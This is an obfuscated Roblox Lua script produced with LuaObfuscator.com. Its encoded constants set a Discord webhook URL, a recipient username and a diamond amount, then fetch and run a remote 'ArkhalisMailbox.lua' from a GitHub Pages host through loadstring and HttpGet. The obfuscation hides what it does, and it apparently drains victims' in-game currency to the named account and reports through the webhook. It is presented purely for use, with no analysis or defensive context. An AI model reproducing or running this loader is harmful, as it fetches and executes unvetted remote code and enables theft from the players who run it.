--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));return "";end end else local v85=v2(v0(v30,16));if v19 then local v92=0;local v93;while true do if (v92==1) then return v93;end if (v92==0) then v93=v5(v85,v19);v19=nil;v92=1;end end else return v85;end end end);local function v20(v31,v32,v33)if v33 then local v86=877 -(282 + 595) ;local v87;while true do if (v86==((1637 -(1523 + 114)) -0)) then v87=(v31/((5 -3)^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-(620 -(499 + 56 + 64)))) + 1)) ;return v87-(v87%(932 -(857 + (105 -31)))) ;end end else local v88=(570 -(367 + 201))^(v32-(928 -(214 + (1778 -(68 + 997))))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + ((1075 -(892 + 65)) -(32 + 85)) ;v34=1 + 0 ;end if (v34==1) then return v35;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + ((15 -11) -1) );v18=v18 + (955 -(802 + 150)) + 1 ;return (v41 * ((110899618 -69708799) -24413603)) + (v40 * (48199 + 17337)) + (v39 * (606 -(87 + 263))) + v38 ;end local function v24()local v42=(0 + 0) -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==3) then if (v47==(0 + 0)) then if (v46==(997 -(915 + 82))) then return v48 * (0 -0) ;else v47=1 + 0 ;v45=0 -(772 -(201 + 571)) ;end elseif (v47==2047) then return ((v46==(1187 -(1069 + 118))) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(2237 -1214) ) * (v45 + (v46/((1 + 1)^(92 -40)))) ;end if (v42==(1 + 0)) then v45=1;v46=(v20(v44,792 -(368 + 423) ,62 -42 ) * ((20 -(10 + 8))^(122 -(1228 -(116 + 1022))))) + v43 ;v42=444 -(416 + (108 -82)) ;end if (v42==(6 -4)) then v47=v20(v44,10 + 11 ,31);v48=((v20(v44,32)==(1 -0)) and  -1) or (439 -(145 + 293)) ;v42=(255 + 178) -((160 -116) + (1370 -984)) ;end if (v42==(1486 -(998 + 488))) then v43=v23();v44=v23();v42=(860 -(814 + 45)) + 0 ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;local v51={};for v68=1 -0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v52==(5 -3)) then v57=nil;v58=nil;v52=4 -1 ;end if (v52==(1 + 0)) then v55=nil;v56=nil;v52=2;end if (v52==(7 -3)) then v61=nil;while true do if ((66 -(30 + 35))~=v53) then else local v98=0;while true do if (v98==(1 + 0)) then v53=1259 -(1043 + 214) ;break;end if (v98==(0 -0)) then v56=nil;v57=nil;v98=1213 -(323 + 889) ;end end end if (v53==4) then while true do if (v54==0) then local v109=0;local v110;while true do if (v109~=(0 -0)) then else v110=0;while true do if (v110==1) then v54=1;break;end if (v110==(580 -(361 + 219))) then local v159=320 -(53 + 267) ;while true do if (v159~=(0 + 0)) then else v55=0;v56=nil;v159=414 -(15 + 398) ;end if (v159==(983 -(18 + 964))) then v110=3 -2 ;break;end end end end break;end end end if (v54~=(1 + 0)) then else local v111=0;local v112;while true do if (v111==0) then v112=0;while true do if (v112~=(1 + 0)) then else v54=852 -(20 + 830) ;break;end if (v112==0) then local v160=0;while true do if (v160==1) then v112=1 + 0 ;break;end if (v160==0) then v57=nil;v58=nil;v160=1;end end end end break;end end end if (v54~=(129 -(116 + 10))) then else v61=nil;while true do local v115=0 + 0 ;local v116;while true do if (v115~=0) then else v116=0;while true do if (v116~=(739 -(542 + 196))) then else if (v55~=0) then else local v163=0 -0 ;local v164;while true do if (v163==0) then v164=0;while true do if (0~=v164) then else v56={};v57={};v164=1;end if (v164==2) then v55=1 + 0 ;break;end if (v164~=(1 + 0)) then else local v170=0;while true do if ((0 + 0)==v170) then v58={};v59={v56,v57,nil,v58};v170=2 -1 ;end if (v170==1) then v164=1553 -(1126 + 425) ;break;end end end end break;end end end break;end if (v116~=0) then else local v162=0;while true do if (v162~=(405 -(118 + 287))) then else if ((7 -5)==v55) then local v165=0;local v166;local v167;while true do if (v165==(1122 -(118 + 1003))) then while true do if (v166~=0) then else v167=0 -0 ;while true do local v175=0;local v176;while true do if (v175~=0) then else v176=0;while true do if (v176~=(377 -(142 + 235))) then else if (v167~=0) then else local v184=0;local v185;while true do if (v184~=0) then else v185=0;while true do if (v185~=(4 -3)) then else v167=1;break;end if ((0 + 0)~=v185) then else local v188=977 -(553 + 424) ;while true do if ((0 -0)==v188) then for v190=1,v23() do local v191=0 + 0 ;local v192;while true do if (v191~=(0 + 0)) then else v192=v21();if (v20(v192,1 + 0 ,1)~=(0 + 0)) then else local v195=0;local v196;local v197;local v198;while true do if ((2 + 0)==v195) then local v199=0;while true do if (v199~=1) then else v195=6 -3 ;break;end if (0~=v199) then else if (v20(v197,2 -1 ,2 -1 )==(1 + 0)) then v198[2]=v61[v198[2]];end if (v20(v197,9 -7 ,755 -(239 + 514) )~=1) then else v198[3]=v61[v198[2 + 1 ]];end v199=1;end end end if (v195~=0) then else local v200=0;local v201;while true do if ((1329 -(797 + 532))~=v200) then else v201=0;while true do if (v201~=1) then else v195=1;break;end if (v201==0) then local v214=0;while true do if (v214==0) then v196=v20(v192,2 + 0 ,2 + 1 );v197=v20(v192,9 -5 ,1208 -(373 + 829) );v214=1;end if (1~=v214) then else v201=732 -(476 + 255) ;break;end end end end break;end end end if (v195~=(1131 -(369 + 761))) then else local v202=0 + 0 ;while true do if (v202~=0) then else v198={v22(),v22(),nil,nil};if (v196==0) then local v210=0 + 0 ;local v211;local v212;local v213;while true do if (v210~=1) then else v213=nil;while true do if (0==v211) then local v217=0;while true do if (1~=v217) then else v211=1 -0 ;break;end if (v217~=0) then else v212=336 -(144 + 192) ;v213=nil;v217=217 -(42 + 174) ;end end end if (v211==1) then while true do if (v212==0) then v213=0 + 0 ;while true do if (v213~=0) then else v198[3]=v22();v198[4]=v22();break;end end break;end end break;end end break;end if (v210==(0 + 0)) then v211=0 + 0 ;v212=nil;v210=1505 -(363 + 1141) ;end end elseif (v196==1) then v198[1583 -(1183 + 397) ]=v23();elseif (v196==2) then v198[8 -5 ]=v23() -(2^16) ;elseif (v196==(3 + 0)) then local v218=0;local v219;while true do if (v218~=(0 + 0)) then else v219=1975 -(1913 + 62) ;while true do if (v219~=(0 + 0)) then else v198[3]=v23() -(2^(42 -26)) ;v198[1937 -(565 + 1368) ]=v22();break;end end break;end end end v202=1;end if (v202==(3 -2)) then v195=1663 -(1477 + 184) ;break;end end end if (v195~=(3 -0)) then else if (v20(v197,3,3 + 0 )==(857 -(564 + 292))) then v198[4]=v61[v198[6 -2 ]];end v56[v190]=v198;break;end end end break;end end end for v193=2 -1 ,v23() do v57[v193-1 ]=v28();end v188=1;end if (v188==(305 -(244 + 60))) then v185=1 + 0 ;break;end end end end break;end end end if (v167==1) then return v59;end break;end end break;end end end break;end end break;end if (v165==(476 -(41 + 435))) then v166=0;v167=nil;v165=1002 -(938 + 63) ;end end end if ((1 + 0)~=v55) then else local v168=1125 -(936 + 189) ;local v169;while true do if ((0 + 0)~=v168) then else v169=0;while true do if (v169~=(1614 -(1565 + 48))) then else local v171=0 + 0 ;local v172;while true do if (v171~=(1138 -(782 + 356))) then else v172=267 -(176 + 91) ;while true do if (v172~=(0 -0)) then else for v179=1 -0 ,v60 do local v180=0;local v181;local v182;local v183;while true do if (v180~=1) then else v183=nil;while true do if (v181~=(1092 -(975 + 117))) then else local v186=0;while true do if (1==v186) then v181=1876 -(157 + 1718) ;break;end if (v186~=(0 + 0)) then else local v189=0;while true do if (v189==(0 -0)) then v182=v21();v183=nil;v189=3 -2 ;end if (v189~=(1019 -(697 + 321))) then else v186=2 -1 ;break;end end end end end if (v181~=(1 -0)) then else if (v182==(2 -1)) then v183=v21()~=0 ;elseif (v182==(1 + 1)) then v183=v24();elseif (v182==3) then v183=v25();end v61[v179]=v183;break;end end break;end if ((0 -0)==v180) then v181=0 -0 ;v182=nil;v180=1;end end end v59[3]=v21();v172=1228 -(322 + 905) ;end if (v172~=1) then else v169=2;break;end end break;end end end if (v169~=(613 -(602 + 9))) then else v55=1191 -(449 + 740) ;break;end if (v169~=(872 -(826 + 46))) then else local v173=0;local v174;while true do if (v173~=0) then else v174=947 -(245 + 702) ;while true do if ((0 -0)~=v174) then else local v178=0;while true do if (v178==(1 + 0)) then v174=1899 -(260 + 1638) ;break;end if (v178~=(440 -(382 + 58))) then else v60=v23();v61={};v178=1;end end end if (v174~=1) then else v169=3 -2 ;break;end end break;end end end end break;end end end v162=1 + 0 ;end if (v162==1) then v116=1 -0 ;break;end end end end break;end end end break;end if (v54~=(5 -3)) then else local v113=0;local v114;while true do if (0==v113) then v114=0;while true do if (v114~=0) then else local v161=0;while true do if (v161~=(1206 -(902 + 303))) then else v114=1;break;end if (v161~=(0 -0)) then else v59=nil;v60=nil;v161=1;end end end if (v114==1) then v54=6 -3 ;break;end end break;end end end end break;end if (v53~=3) then else local v99=0 + 0 ;while true do if (v99==0) then v60=nil;v61=nil;v99=1691 -(1121 + 569) ;end if (v99==1) then v53=218 -(22 + 192) ;break;end end end if ((685 -(483 + 200))~=v53) then else local v100=1463 -(1404 + 59) ;while true do if (v100==0) then v58=nil;v59=nil;v100=1;end if (v100==1) then v53=3;break;end end end if (v53~=0) then else v54=0 -0 ;v55=nil;v53=1 -0 ;end end break;end if ((765 -(468 + 297))==v52) then v53=562 -(334 + 228) ;v54=nil;v52=1;end if (v52==(10 -7)) then v59=nil;v60=nil;v52=8 -4 ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v70=v65;local v71=v66;local v72=v67;local v73=v27;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v89=0,v78 do if (v89>=v72) then v76[v89-v72 ]=v77[v89 + 1 ];else v80[v89]=v77[v89 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=5) then if (v83<=2) then if (v83<=0) then v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v74=v82[3];elseif (v83==1) then v74=v82[3];elseif (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83<=3) then v80[v82[2]][v82[3]]=v82[4];elseif (v83==4) then local v118=0;local v119;local v120;while true do if (v118==0) then v119=v82[2];v120=v80[v82[3]];v118=1;end if (1==v118) then v80[v119 + 1 ]=v120;v80[v119]=v120[v82[4]];break;end end else v80[v82[2]]=v64[v82[3]];end elseif (v83<=8) then if (v83<=6) then do return;end elseif (v83==7) then v80[v82[2]]=v82[3];else local v125=v82[2];v80[v125]=v80[v125](v13(v80,v125 + 1 ,v75));end elseif (v83<=9) then v80[v82[2]]();elseif (v83==10) then local v127=v82[2];local v128,v129=v73(v80[v127](v13(v80,v127 + 1 ,v82[3])));v75=(v129 + v127) -1 ;local v130=0;for v147=v127,v75 do v130=v130 + 1 ;v80[v147]=v128[v130];end else local v131;local v132,v133;local v134;local v135;v80[v82[2]][v82[3]]=v82[4];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v64[v82[3]];v74=v74 + 1 ;v82=v70[v74];v135=v82[2];v134=v80[v82[3]];v80[v135 + 1 ]=v134;v80[v135]=v134[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v74=v74 + 1 ;v82=v70[v74];v135=v82[2];v132,v133=v73(v80[v135](v13(v80,v135 + 1 ,v82[3])));v75=(v133 + v135) -1 ;v131=0;for v150=v135,v75 do v131=v131 + 1 ;v80[v150]=v132[v131];end v74=v74 + 1 ;v82=v70[v74];v135=v82[2];v80[v135]=v80[v135](v13(v80,v135 + 1 ,v75));v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];end v74=v74 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31302O392O3236312O3631303130312O3630372F704533557462584768636638526661644F445F694A4B445966766E7874413837362O30614D624252664B4373437767733553676942346258433152516442346A6C4A3948030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403313O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F41726B68616C69734D61696C626F782E6C756103083O00557365726E616D65030C3O00536179636F416E67656C657303083O004469616D6F6E6473024O0080841E4100163O0012073O00013O0026023O000D000100020004013O000D0001001205000100033O00300B00010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O001500010026023O0001000100010004013O00010001001205000100033O00302O0001000A000B00122O000100033O00302O0001000C000D00124O00023O00044O000100012O00063O00017O00",v9(),...);end
